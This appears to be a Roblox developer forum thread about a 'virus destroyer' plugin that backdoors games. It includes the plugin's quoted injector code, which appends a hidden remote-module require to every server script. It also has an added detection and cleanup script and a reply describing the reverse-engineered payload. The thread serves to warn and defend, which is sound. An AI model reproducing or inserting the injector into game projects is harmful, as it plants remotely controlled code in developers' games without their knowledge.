This script is being added to my game

Yes, if you are wondering about this plugin:
In one of the scripts, this is hidden in it.
I looked through the code of the plugin and managed to find this, which is the backdoor.

pcall(function()local b='\n --[[ --]] pcall(function()require(4850721608):Fire()end) 'for a,a in pairs(workspace:GetDescendants()) do if a:IsA("Script")then a.Source=a.Source..b end end for a,a in pairs(game:GetService("ServerScriptService"):GetDescendants())do if a:IsA("Script")then a.Source=a.Source..b end end end)

This is the code that adds the backdoor to the game scripts.
I also suggest looking at the like ratio, creator, and comments of any plugin before getting/buying it. And altogether, I highly suggest never getting any type of virus destroyer; these tend to be backdoors.
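
An added example, not part of the original posts and not the plugin's code: a Roblox Studio command-bar script that reports every script containing `require(<number>)` and can strip the appended trailer quoted above. `REMOVE`, `findRequiredIds` and the trailer pattern are assumptions built from that snippet, and the pattern matches any numeric asset ID rather than only the one shown.

```lua
-- Added example: paste into the Roblox Studio command bar, which can read
-- and write Script.Source. Names below are hypothetical, not from the plugin.
local REMOVE = false -- set to true only after reviewing the report

-- Any require of a numeric asset ID. Legitimate code can do this too,
-- so a hit is something to review, not proof of infection.
local NUMERIC_REQUIRE = "require%s*%(%s*(%d+)%s*%)"

-- The exact trailer shape from the quoted snippet, with magic characters
-- escaped and the asset ID generalised to any number (assumption).
local TRAILER = "\n %-%-%[%[ %-%-%]%] pcall%(function%(%)require%(%d+%):Fire%(%)end%) "

local function findRequiredIds(source)
	local ids = {}
	for id in string.gmatch(source, NUMERIC_REQUIRE) do
		table.insert(ids, id)
	end
	return ids
end

local flagged, cleanedCount = 0, 0
for _, inst in ipairs(game:GetDescendants()) do
	-- Some instances refuse property access; pcall keeps the scan going.
	local ok, source = pcall(function()
		return inst:IsA("LuaSourceContainer") and inst.Source or nil
	end)
	if ok and source then
		local ids = findRequiredIds(source)
		if #ids > 0 then
			flagged += 1
			warn(string.format("%s -> require id(s): %s",
				inst:GetFullName(), table.concat(ids, ", ")))
		end
		-- The injector appends one copy per run, so remove every copy.
		local cleaned, copies = string.gsub(source, TRAILER, "")
		if copies > 0 and REMOVE then
			inst.Source = cleaned
			cleanedCount += 1
		end
	end
end
print(string.format("%d script(s) flagged, %d cleaned", flagged, cleanedCount))
```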

Necrobump, and apologies for such.

I had this script added to a game of mine as well and took it as a challenge to reverse engineer it.

Here is my process of reverse engineering the script, which took me about an hour and a half.

The final code execution is very underwhelming; it just gives a few specific players a sign when they join, and that’s pretty much it.

Here is an attachment where you can check out all of the reverse engineered parts.
fix-lua-reverse-engineer.rbxl (36.0 KB)

The path ended up being this:
image
Black boxes are obfuscation while red boxes contain the actual payload.

For the final code execution, see the script game.Workspace.simplification.FinalCode.
As mentioned in my reverse engineering process, the final code is a combination of code from the module modified and MainModule_builderx1337.

I am only publishing this to inform players what the code mentioned actually does.

Happy coding!

Edit: Fix dead link (from my website → pastebin)


Who made the plugin, because my friend is having this problem themselves?